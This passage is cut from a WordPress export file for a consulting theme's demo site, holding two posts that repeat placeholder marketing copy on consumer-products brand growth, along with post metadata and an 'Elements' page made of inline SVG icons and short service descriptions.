		<pubDate>Thu, 08 Nov 2018 09:04:46 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=436</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>436</wp:post_id>
		<wp:post_date><![CDATA[2018-11-08 09:04:46]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-11-08 09:04:46]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[how-to-write-a-successful-grant-application]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="category" nicename="finance"><![CDATA[finance]]></category>
		<category domain="post_format" nicename="post-format-gallery"><![CDATA[Gallery]]></category>
		<category domain="post_tag" nicename="strategy"><![CDATA[strategy]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2018-11-04]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[438]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[439]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[post_gallery]]></wp:meta_key>
		<wp:meta_value><![CDATA[440]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Crowdfunding. How to Get Funding Online?</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/crowdfunding-how-to-get-funding-online/</link>
		<pubDate>Sun, 04 Mar 2018 09:07:57 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?p=444</guid>
		<description></description>
		<content:encoded><![CDATA[<span class="drop-cap"><span class="drop-cap-letter">N</span></span> ot so long ago, marketing consumer products felt like a genteel game of lawn tennis: Established competitors invested in creative with long lead times, using proven models of TV and big-box retail, alongside trusted agency partners. Today, it’s more like a sprawling contest of mixed martial arts, with new competitors playing by different rules; an unprecedented complexity of channels, <span style="color: #4b83fc;">content and partners; and a step change</span> in speed and ways of working that has punches flying at incumbent consumer products companies.

<span style="color: #1b1d21; font-weight: 600;">Fueling the blur of combat is a radical shift in brand growth models.</span> Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. The same technology advances have dramatically altered the competitive landscape. CMOs can no longer forecast forward their current profit pools only by looking to fill in geographies and nearby product market segments. That process risks ignoring the industry’s disruptive trends, as profit pools shift quickly from products to services to experiences and communities, and as mass products evolve into new segments with accelerating personalization. <em>Growth strategy today requires consumer products companies to look “present forward” and “future back”—to create a faster horse while envisioning the car—in order to define new growth platforms beyond their current products, business model and capabilities.</em>

<img class="alignnone size-full wp-image-417" src="https://maxbizz.s3.amazonaws.com/images/post.jpg" alt="" width="870" height="350" />
<h5><strong>Upgrade Content Creation Capabilities</strong></h5>
Fueling the blur of combat is a radical shift in brand growth models. Within the span of most executives’ careers, advances in technology have reshaped how consumers engage with brands. In the US and UK, more than 60% of consumers now discover products online, and 85% of millennials trust reviews from a faceless stranger more than traditional advertising. <span style="color: #1b1d21; font-weight: 600;">The same technology advances have dramatically</span> altered the competitive landscape. However, the transformation still required across the industry is significant, involving far-reaching changes to consumer products companies’ growth models and the largest buckets of their discretionary spending. And it’s urgent, as consumers and new competitors are moving faster than incumbents can react.
<blockquote>
<p style="text-align: center; line-height: 36px;">“I cannot give you the formula for success, but I can give you the formula for failure. It is: Try to please everybody.”
<cite>DAVID OSWALD</cite></p>
</blockquote>
What’s the right path forward? Reinventing the brand growth model requires more than a reallocation of marketing budget to digital. CMOs need a reassessment of growth platforms and future brand portfolios, a new understanding of the consumer journey, a supporting strategy on data and technology.

<em>The consumer journey has fundamentally changed, and so has the role of the brand manager. Once guardians of the brief to agencies, today they must lead hands-on content generation, data management.</em>]]></content:encoded>
		<excerpt:encoded><![CDATA[Most firms have set up a war room to triage their immediate response to the crisis. But the lack of visibility around future demand complicates efforts to restart stalled portfolio companies...]]></excerpt:encoded>
		<wp:post_id>444</wp:post_id>
		<wp:post_date><![CDATA[2018-03-04 09:07:57]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2018-03-04 09:07:57]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[open]]></wp:comment_status>
		<wp:ping_status><![CDATA[open]]></wp:ping_status>
		<wp:post_name><![CDATA[crowdfunding-how-to-get-funding-online]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[post]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
										<category domain="category" nicename="business"><![CDATA[business]]></category>
		<category domain="category" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="consulting"><![CDATA[consulting]]></category>
		<category domain="post_tag" nicename="marketing"><![CDATA[marketing]]></category>
						<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_old_date]]></wp:meta_key>
		<wp:meta_value><![CDATA[2020-09-04]]></wp:meta_value>
		</wp:postmeta>
							</item>
					<item>
		<title>Elements</title>
		<link>http://wpdemo.archiwp.com/maxbizz-consulting/elements__trashed/</link>
		<pubDate>Wed, 09 Sep 2020 06:56:17 +0000</pubDate>
		<dc:creator><![CDATA[admin]]></dc:creator>
		<guid isPermaLink="false">http://wpdemo.archiwp.com/maxbizz/?page_id=624</guid>
		<description></description>
		<content:encoded><![CDATA[<h4>Icon Boxes</h4>		
						<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 7.515-3.365 7.515-7.515v-89.56h14.754c2.997 0 5.708-1.781 6.898-4.533 1.189-2.751.63-5.947-1.424-8.13z"></path><path d="m263.229 296.294c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.046 54.269c-2.054 2.184-2.614 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v141.259c0 4.15 3.365 7.515 7.515 7.515h57.555c4.151 0 7.515-3.365 7.515-7.515v-141.259h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13zm23.304 51.903c-4.151 0-7.515 3.365-7.515 7.515v141.259h-42.526v-141.26c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.882z"></path><path d="m396.221 248.46c-1.42-1.51-3.401-2.366-5.474-2.366-2.072 0-4.054.856-5.474 2.366l-51.047 54.268c-2.054 2.183-2.614 5.379-1.425 8.13 1.19 2.752 3.9 4.533 6.898 4.533h14.754v45.859c0 4.15 3.364 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-53.373c0-4.15-3.364-7.515-7.515-7.515h-4.883l33.661-35.786 33.66 35.786h-4.883c-4.151 0-7.515 3.365-7.515 7.515v189.094h-42.526v-105.662c0-4.15-3.364-7.515-7.515-7.515s-7.515 3.364-7.515 7.515v113.177c0 4.15 3.364 7.515 7.515 7.515h57.556c4.151 0 7.515-3.365 7.515-7.515v-189.095h14.754c2.998 0 5.708-1.781 6.898-4.533 1.189-2.751.629-5.947-1.425-8.13z"></path><path d="m92.805 139.396c0-4.15-3.365-7.515-7.515-7.515h-44.075c-4.15 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151-.001 7.515-3.365 7.515-7.515z"></path><path d="m95.012 198.37-15.676 6.141c-3.865 1.514-5.77 5.874-4.256 9.738 1.161 2.964 3.997 4.775 6.999 4.775.912 0 1.839-.167 2.739-.52l15.676-6.141c3.865-1.514 5.77-5.874 4.256-9.738-1.515-3.863-5.875-5.769-9.738-4.255z"></path><path d="m79.336 74.279 15.676 6.141c.901.353 1.827.52 2.739.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.256-9.738l-15.676-6.141c-3.866-1.514-8.224.392-9.738 4.256-1.514 3.863.392 8.223 4.256 9.737z"></path><path d="m470.785 131.881h-44.075c-4.151 0-7.515 3.365-7.515 7.515s3.364 7.515 7.515 7.515h44.075c4.151 0 7.515-3.365 7.515-7.515-.001-4.15-3.365-7.515-7.515-7.515z"></path><path d="m411.506 212.365 15.675 6.141c.901.353 1.828.52 2.74.52 3.002 0 5.838-1.812 6.999-4.775 1.514-3.864-.391-8.224-4.255-9.738l-15.675-6.141c-3.868-1.514-8.224.392-9.739 4.256-1.514 3.862.391 8.222 4.255 9.737z"></path><path d="m414.25 80.94c.912 0 1.84-.167 2.74-.52l15.675-6.141c3.864-1.514 5.769-5.874 4.255-9.738-1.515-3.865-5.876-5.768-9.739-4.256l-15.675 6.141c-3.864 1.514-5.769 5.874-4.255 9.738 1.161 2.965 3.997 4.776 6.999 4.776z"></path></g></svg>					
			        				            <h6>Financial Services</h6>			            <p>We help financial institutions, from banking and insurance to wealth and securities distribution, manage risks.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" id="Capa_1" x="0px" y="0px" viewBox="0 0 511.999 511.999" style="enable-background:new 0 0 511.999 511.999;" xml:space="preserve">
<g>
	<g>
		<path d="M505.709,159.575L336.462,50.682c-3.379-2.174-7.879-1.196-10.052,2.181c-2.173,3.378-1.197,7.878,2.181,10.052    l166.773,107.301h-38.878L266.64,48.07c-6.463-4.158-14.816-4.157-21.28,0L55.514,170.216H16.636L255.991,16.204l33.899,21.81    c3.379,2.173,7.878,1.197,10.052-2.181c2.173-3.378,1.197-7.878-2.181-10.052l-33.899-21.81c-4.776-3.073-10.947-3.073-15.723,0    L6.291,159.575c-5.15,3.314-7.45,9.488-5.723,15.364c1.727,5.876,7.002,9.824,13.126,9.824h36.684v25.07v21.956    c0,5.789,4.106,10.637,9.558,11.784v12.801c0,6.64,5.402,12.042,12.042,12.042h1v89.112c0,4.017,3.256,7.273,7.273,7.273    c4.017,0,7.273-3.256,7.273-7.273v-96.385c0-4.017-3.256-7.273-7.273-7.273h-5.768v-10.04h51.513v10.038h-5.768    c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.273,7.273,7.273h5.768v10.915H74.483V429.11h5.768    c4.017,0,7.273-3.256,7.273-7.273v-18.59c0-4.017-3.256-7.273-7.273-7.273c-4.017,0-7.273,3.256-7.273,7.273v11.317h-1    c-6.64,0-12.042,5.401-12.042,12.041v12.801c-5.453,1.147-9.558,5.995-9.558,11.784v14.682H24.614    c-8.04,0-14.581,6.541-14.581,14.581v15.299c0,8.04,6.541,14.581,14.581,14.581h462.772c8.04,0,14.581-6.541,14.581-14.581    v-15.299c0-8.04-6.541-14.581-14.581-14.581h-25.764V451.19c0-5.789-4.106-10.637-9.558-11.784v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-21.956v-25.07h36.684c6.124,0,11.399-3.948,13.126-9.824    C513.159,169.063,510.859,162.888,505.709,159.575z M253.23,60.303c1.683-1.083,3.857-1.082,5.54,0l170.833,109.914H82.398    L253.23,60.303z M64.924,184.762h382.151v17.797h-77.902h-70.585h-85.176h-70.585H64.924V184.762z M296.304,439.408v-12.801    c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.453-1.147,9.558-5.995,9.558-11.784v-14.683H361.9v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682h-56.038v-14.682C305.862,445.403,301.756,440.555,296.304,439.408z     M140.542,439.408v-12.801c0-6.64-5.402-12.041-12.042-12.041h-1v-146.15h1c6.64,0,12.042-5.402,12.042-12.042v-12.801    c5.452-1.147,9.558-5.995,9.558-11.784v-14.683h56.039v14.683c0,5.789,4.106,10.637,9.558,11.784v12.801    c0,6.64,5.402,12.042,12.042,12.042h1v146.15h-1c-6.64,0-12.042,5.401-12.042,12.041v12.801    c-5.452,1.147-9.558,5.995-9.558,11.784v14.682H150.1v-14.682C150.1,445.403,145.994,440.555,140.542,439.408z M275.989,429.11    h5.768v10.915h-51.513V429.11h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142c0-4.017-3.256-7.274-7.273-7.274h-5.768V243.83    h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696C268.716,425.854,271.972,429.11,275.989,429.11z M222.97,229.284    h-0.032h-2.253v-12.178h70.63v12.178h-2.285c-0.005,0-0.011,0.001-0.016,0.001s-0.011-0.001-0.016-0.001H222.97z M220.685,454.213    c0.71,0.231,1.466,0.36,2.253,0.36h66.059c0.811,0,1.589-0.139,2.318-0.384v11.684h-70.63V454.213z M67.21,229.284h-2.285v-12.178    h70.63v12.178h-0.001h-2.285H67.21z M64.924,454.201c0.719,0.238,1.486,0.372,2.285,0.372h66.06c0.799,0,1.566-0.134,2.285-0.372    v11.672h-70.63V454.201z M487.421,480.454l-0.02,15.333c0,0-0.004,0.001-0.015,0.001l-462.807-0.034l0.035-15.334L487.421,480.454    z M444.77,454.572c0.807,0,1.58-0.137,2.306-0.379v11.68h-70.63v-11.665c0.713,0.234,1.473,0.364,2.265,0.364H444.77z     M391.772,253.869h-5.768V243.83h51.513v10.038h-5.768c-4.017,0-7.273,3.256-7.273,7.273v160.696c0,4.017,3.256,7.274,7.273,7.274    h5.768v10.915h-51.513v-10.915h5.768c4.017,0,7.273-3.256,7.273-7.273V261.142C399.045,257.125,395.789,253.869,391.772,253.869z     M447.077,229.284L447.077,229.284h-2.286c-0.003,0-0.007,0.001-0.01,0.001s-0.007-0.001-0.01-0.001h-66.039h-0.02h-2.265v-12.178    h70.63V229.284z"></path>
	</g>
</g>
<g>
	<g>
		<path d="M259.076,113.165V90.459c7.83,0.559,10.738,4.138,13.422,4.138c3.356,0,4.922-4.25,4.922-6.375    c0-5.48-10.738-7.829-18.344-8.053v-3.02c0-1.343-1.677-2.573-3.355-2.573c-1.902,0-3.244,1.231-3.244,2.573v3.244    c-10.626,1.118-21.252,6.711-21.252,20.804c0,14.317,11.186,18.344,21.252,21.923v26.283c-11.409-0.894-14.429-8.724-18.12-8.724    c-2.796,0-5.145,3.691-5.145,6.376c0,5.481,9.395,12.975,23.265,13.199h0v3.468c0,1.343,1.342,2.573,3.244,2.573    c1.677,0,3.355-1.231,3.355-2.573v-3.803c12.08-1.677,20.357-9.283,20.357-23.041    C279.433,121.666,268.807,116.744,259.076,113.165z M253.149,111.04c-5.929-2.237-10.738-4.586-10.738-10.962    c0-5.816,4.474-8.612,10.738-9.395V111.04z M258.406,149.181V125.58c5.48,2.349,9.842,5.481,9.843,12.528    C268.249,144.483,264.446,148.063,258.406,149.181z"></path>
	</g>
</g>
</svg>					
			        				            <h6>Government Services</h6>			            <p>Our firm has helped clients engaged in more than 100 different subsectors of the aerospace, space markets.</p>			        
						<svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512.01 512.01"><g><path d="m479.659 248.51h-72.427l27.649-15.963c15.448-8.919 20.76-28.743 11.841-44.191l-85.052-147.317-1.922-3.329-12.424-21.52c-4.32-7.483-11.297-12.836-19.644-15.073-8.349-2.238-17.065-1.088-24.548 3.232l-154.14 88.993c-3.587 2.071-4.816 6.658-2.745 10.245s6.658 4.817 10.245 2.745l154.14-88.993c8.284-4.782 18.917-1.935 23.701 6.351l8.675 15.025-316.994 183.016-8.675-15.026c-2.317-4.013-2.933-8.689-1.733-13.166 1.2-4.476 4.07-8.217 8.084-10.535l105.905-61.144c3.587-2.071 4.816-6.658 2.745-10.245s-6.658-4.817-10.245-2.745l-105.906 61.145c-7.483 4.32-12.836 11.296-15.073 19.643-2.236 8.346-1.089 17.064 3.232 24.547l12.423 21.517c.001.001.001.003.002.004l12.425 21.521 74.55 129.125c2.93 5.074 7.173 9.228 12.228 12.056v81.232c0 17.838 14.512 32.35 32.35 32.35h226.715c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-226.714c-9.567 0-17.35-7.783-17.35-17.35v-85.724c.004-.085-.001-.168 0-.253v-112.823c0-9.567 7.783-17.35 17.35-17.35h230.9c.008 0 .015.001.023.001.007 0 .015-.001.023-.001h100.387c9.567 0 17.351 7.783 17.351 17.35v198.8c0 9.567-7.783 17.35-17.351 17.35h-74.616c-4.143 0-7.5 3.358-7.5 7.5s3.357 7.5 7.5 7.5h74.616c17.838 0 32.351-14.512 32.351-32.35v-198.8c-.001-17.838-14.514-32.35-32.352-32.35zm-129.151-196.805 2.637 4.568 6.429 11.136-316.993 183.017-9.067-15.704zm-234.531 229.155v96.692l-65.897-114.136 316.994-183.017 66.658 115.456c4.783 8.285 1.934 18.917-6.351 23.701l-50.149 28.954h-228.905c-17.838 0-32.35 14.512-32.35 32.35z"></path><path d="m389.037 154.707c-2.07-3.587-6.66-4.816-10.245-2.745l-71.736 41.417c-3.587 2.071-4.816 6.658-2.745 10.245 1.389 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006l71.736-41.417c3.587-2.071 4.816-6.658 2.745-10.245z"></path><path d="m402.858 193.646c3.587-2.071 4.816-6.658 2.745-10.245s-6.66-4.816-10.245-2.745l-28.694 16.567c-3.587 2.071-4.816 6.658-2.745 10.245 1.39 2.406 3.91 3.751 6.502 3.751 1.272 0 2.563-.324 3.743-1.006z"></path><path d="m363.409 346.343h83.4c8.547 0 15.5-6.953 15.5-15.5v-17.133c0-8.547-6.953-15.5-15.5-15.5h-83.4c-8.547 0-15.5 6.953-15.5 15.5v17.133c0 8.547 6.953 15.5 15.5 15.5zm-.5-32.633c0-.276.225-.5.5-.5h83.4c.275 0 .5.224.5.5v17.133c0 .276-.225.5-.5.5h-83.4c-.275 0-.5-.224-.5-.5z"></path><path d="m246.943 347.41v-50.267c0-8.547-6.953-15.5-15.5-15.5h-66.833c-8.547 0-15.5 6.953-15.5 15.5v50.267c0 8.547 6.953 15.5 15.5 15.5h66.833c8.547 0 15.5-6.953 15.5-15.5zm-15-50.267v17.633h-26.417v-18.133h25.917c.276 0 .5.224.5.5zm-67.333-.5h25.917v18.133h-26.417v-17.633c0-.276.224-.5.5-.5zm-.5 50.767v-17.633h67.833v17.633c0 .276-.224.5-.5.5h-66.833c-.276 0-.5-.224-.5-.5z"></path><path d="m156.61 430.743c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5h33.133c4.142 0 7.5-3.358 7.5-7.5s-3.358-7.5-7.5-7.5z"></path><path d="m222.876 445.743h99.4c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-99.4c-4.142 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path><path d="m355.409 445.743h49.7c4.143 0 7.5-3.358 7.5-7.5s-3.357-7.5-7.5-7.5h-49.7c-4.143 0-7.5 3.358-7.5 7.5s3.358 7.5 7.5 7.5z"></path></g></svg>					
			        				            <h6>Consumer Products</h6>			            <p>Our work draws on more than 40 years of experience, delivered by 5,700 professionals in the world.</p>			        
		        <svg xmlns="http://www.w3.org/2000/svg" id="Capa_1" viewBox="0 0 512 512"><g><path d="m257.756 273.413c75.381 0 136.707-61.326 136.707-136.707 0-75.38-61.326-136.706-136.707-136.706s-136.707 61.326-136.707 136.706c0 75.381 61.327 136.707 136.707 136.707zm0-258.384c67.093 0 121.677 54.584 121.677 121.677s-54.584 121.678-121.677 121.678-121.678-54.584-121.678-121.678c0-67.092 54.585-121.677 121.678-121.677z"></path><path d="m257.755 235.574c54.516 0 98.868-44.352 98.868-98.867s-44.352-98.867-98.868-98.867c-24.609 0-48.193 9.099-66.407 25.621-3.074 2.789-3.305 7.541-.517 10.615 2.789 3.074 7.542 3.307 10.615.517 15.443-14.009 35.441-21.724 56.309-21.724 46.229 0 83.839 37.61 83.839 83.838s-37.61 83.838-83.839 83.838c-46.228 0-83.837-37.609-83.837-83.838 0-13.96 3.497-27.777 10.114-39.957 1.981-3.647.631-8.209-3.016-10.19-3.646-1.982-8.208-.63-10.19 3.016-7.809 14.375-11.937 30.673-11.937 47.131 0 54.515 44.351 98.867 98.866 98.867z"></path><path d="m254.898 172.111c-11.802-.719-15.044-7.822-15.645-9.491-.86-3.212-3.782-5.58-7.265-5.58-4.158 0-7.529 3.371-7.529 7.53 0 .604.079 1.188.213 1.751l-.003.001c.007.027.021.079.04.144.092.355.201.703.342 1.036 1.39 3.834 6.959 15.729 23.371 18.907v9.999c0 4.15 3.365 7.515 7.515 7.515 4.151 0 7.515-3.364 7.515-7.515v-9.773c7.193-1.252 12.025-4.396 15.046-7.239 5.621-5.29 8.977-13.286 8.977-21.39 0-7.615-2.986-25.655-30.649-28.707-5.48-.605-9.389-2.349-11.62-5.183-1.969-2.503-2.182-5.268-2.182-6.341 0-1.322.363-12.913 12.913-12.913 8.234 0 11.559 5.237 12.184 6.376 1.114 2.766 3.818 4.72 6.982 4.72 4.158 0 7.529-3.371 7.529-7.529 0-1.236-.304-2.4-.832-3.429l.004-.002c-2.118-4.604-8.099-11.807-18.353-14.287v-10.087c0-4.15-3.364-7.515-7.515-7.515-4.15 0-7.515 3.365-7.515 7.515v10.055c-14.832 3.522-20.428 17.361-20.428 27.095 0 10.823 7.119 24.248 27.183 26.462 17.268 1.906 17.268 10.835 17.268 13.769 0 3.117-1.115 7.498-4.247 10.445-2.961 2.787-7.433 4.019-13.299 3.661z"></path><path d="m130.238 347.994c-1.42-1.51-3.401-2.366-5.474-2.366s-4.053.856-5.474 2.366l-51.047 54.268c-2.054 2.184-2.613 5.379-1.424 8.13 1.189 2.752 3.9 4.533 6.898 4.533h14.754v27.289c0 4.15 3.365 7.515 7.515 7.515s7.515-3.365 7.515-7.515v-34.804c0-4.15-3.365-7.515-7.515-7.515h-4.884l33.661-35.786 33.661 35.786h-4.884c-4.15 0-7.515 3.365-7.515 7.515v89.56h-42.526v-24.697c0-4.15-3.365-7.515-7.515-7.515s-7.515 3.365-7.515 7.515v32.212c0 4.15 3.365 7.515 7.515 7.515h57.555c4.15 0 